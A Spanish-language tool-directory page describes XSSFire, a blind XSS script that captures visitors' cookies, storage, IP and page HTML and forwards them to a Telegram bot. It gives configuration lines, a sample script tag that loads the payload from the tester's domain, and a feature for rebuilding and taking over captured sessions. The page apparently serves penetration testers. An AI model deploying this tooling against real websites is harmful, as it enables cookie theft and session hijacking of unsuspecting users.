Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
XSSFire — A standalone Blind XSS Script. | Kitploit
Herramientas/GitHubGitHub/seifelsallamy/xssfire
ExploitationWeb Application ExploitationData ExfiltrationInformation GatheringWeb SecurityPenetration Testing
GitHubseifelsallamy/xssfire

XSSFire

A standalone Blind XSS Script.

Ver Repositorio
4710hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

XSSFire

Un script de Blind XSS independiente.

Cómo funciona:

El script es una combinación de PHP y JavaScript; captura los datos usando JS y los envía al propio script, luego genera archivos de informe y los entrega a través de Telegram.

Requisitos:

  1. Servidor web ejecutándose en Linux con un dominio y un certificado SSL.
  2. Cuenta de Telegram (para recibir informes BXSS)

¿Por qué Telegram?

Fácil de configurar. Rápido. Accesible.

Características:

  1. Captura: IP, User-Agent, Fecha-Hora, Local Storage, Session Storage, Cookies, Referrer, Origin, URL, HTML, si se dispara desde un Iframe
  2. Constructor de sesión: un JavaScript que puede reconstruir la sesión: abre la URL capturada y las herramientas de desarrollo, luego pégalo en la consola y pulsa Enter. Si tienes suerte, puedes tomar el control de la sesión.
  3. Notificaciones de Telegram: más rápidas y fáciles de configurar que los correos electrónicos y más accesibles.
  4. Anti-Spam: solo debes recibir una o dos notificaciones por cada URL capturada. Sin embargo, el script se reinicia de vez en cuando para notificarte de nuevo más tarde.
  5. Cifrado: puedes establecer una contraseña en el script y el informe que recibas en Telegram será un archivo zip protegido por contraseña. (Los bots de Telegram no usan cifrado de extremo a extremo).
  6. Instantánea HTML: es un archivo HTML que se entregará con el informe y debería verse similar a la página de tu objetivo.

Configuración:

  1. Ve a Telegram y chatea con @botfather.
  2. Escribe /start en el chat y crea un nuevo bot.
  3. Deberías recibir el token de tu bot cuando lo crees.
  4. Guarda el token aparte.
  5. Ahora ve al chat de tu bot recién creado, inícialo y saluda.
  6. Luego ve a: https://api.telegram.org/bot<bot_token>/getUpdates
  7. Y guarda tu ID de chat.
  8. Abre el script XSSFire y modifica las siguientes líneas:
root@kitploit:~
$chat_id = "<Telegram Chat ID>"; // Tu ID de chat de Telegram
$token = "<Telegram Bot Access Token>"; // Tu token de acceso del bot de Telegram
$password = False; //Protege el informe de Blind XSS con una contraseña. Déjalo como False si no se usa.
  1. Sube el script a tu servidor.

Para generar payloads, puedes considerar usar Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager Puedes crear payloads fácilmente con esta extensión ingresando tudominio.com/ en el campo de dominio y haciendo clic en Guardar.

Nota: puedes cambiar el nombre del archivo a index.php y subirlo al directorio principal de tu servidor para que los payloads sean más cortos; entonces el payload debería verse similar a este <script src="https://tudominio.com"></script>.

Capturas:

bxss bxss2 bxss3

Gracias a GPT-3 xD

Descargar herramienta